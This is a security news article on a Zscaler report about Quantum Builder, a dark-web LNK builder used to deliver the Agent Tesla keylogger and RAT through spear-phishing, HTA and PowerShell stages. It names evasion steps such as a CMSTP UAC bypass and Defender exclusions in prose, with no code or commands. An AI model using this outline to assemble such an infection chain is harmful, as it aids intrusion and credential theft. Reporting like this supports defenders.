A recently discovered malware builder sold on the dark web, Quantum Builder, is being used in a new campaign featuring fresh tactics to deliver the Agent Tesla .NET-based keylogger and remote access trojan (RAT), according to an alert issued by the ThreatLabz research unit of cybersecurity company Zscaler.Quantum Builder, also known as Quantum LNK Builder, is used to create malicious shortcut files. It has been linked to Lazarus\u2014an APT (advanced persistent threat) actor linked to North Korea\u2014due to shared tactics, techniques, procedures (TTPs) and source code overlap. \u201cBut we cannot confidently attribute this campaign to any specific threat actor,\u201d Zscaler noted in a blog post.Agent Tesla was first detected in 2014. In the current campaign, Quantum Builder is being used to generate malicious .lnk, .hta, and PowerShell payloads, which then deliver Agent Tesla to the targeted machines, according to Zscaler.\u201cThis campaign features enhancements and a shift toward LNK (Windows shortcut) files when compared to similar attacks in the past,\u201d Zscaler noted.\u00a0Quantum Builder used in a string of new malware attacksThreat actors are continuously evolving their tactics and making use of malware builders sold on the cybercrime marketplace. \u201cThis Agent Tesla campaign is the latest in a string of attacks in which Quantum Builder has been used to create malicious payloads in campaigns against various organizations,\u201d Zscaler noted.\u00a0The payloads generated by the builder employ sophisticated techniques such asuser account control bypass using the Microsoft Connection Manager Profile Installer (CMSTP) binary to execute the final payload with administrative privileges, and to perform Windows defender exclusions.\u00a0The new malware campaign has also been seen utilizing a multistaged infection chain integrating various attack vectors, Zscaler said. It executes PowerShell scripts in-memory to evade detection and is also seen executing decoys to distract victims after devices have been infected.New attacks start with spear phishing emailThe attack chain starts with a spear-phishing mail that that contains a GZIP attachment. The GZIP includes a shortcut that is designed to execute PowerShell code that is responsible for launching a remote HTML application using mshta.exe binaries. \u00a0The phishing email looks like it is from a Chinese supplier of lump and rock sugar\u2014it has a subject line stating "New Order Confirmation - Guangdong Nanz Technology co. ltd."\u2014and \u00a0has a malicious .lnk file with a PDF icon.Once the document is opened, the HTA file decrypts a PowerShell loader script which decrypts and loads another PowerShell script after performing advanced encryption standard decryption and GZIP decompression.\u00a0The decrypted PowerShell script is the Downloader PS Script, which first downloads the Agent Tesla binary from a remote server, and then executes it with administrative privileges by performing a user account control bypass (UAC) using the CMSTP. Agent Tesla is then executed on the target machine with administrative privileges.\u00a0There was also a second variant of Agent Tesla observed, where the threat actors used a ZIP file and other sophisticated methods to hide their activities. Agent Tesla has been active since 2014, in 2018 it had more than 6,300 customers who pay subscription fees to license the software. Currently, Agent Tesla is being sold for $182 a month on the dark web, according to Hacker News.\u00a0Quantum builder was first discovered by Cyble Research Labs in June this year on a cybercrime forum. The threat actor claimed in the post that Quantum Builder can spoof any extension and has over 300 different icons available for malicious .lnk files. There was also a video posted demonstrating how to build .lnk, .hta, and .iso files using the malware builder.\u00a0The .hta payload can be created using Quantum Builder by customizing options such as payload url, DLL (dynamic link library), UAC Bypass, and execution path detaails as well as a time delay to execute the payload.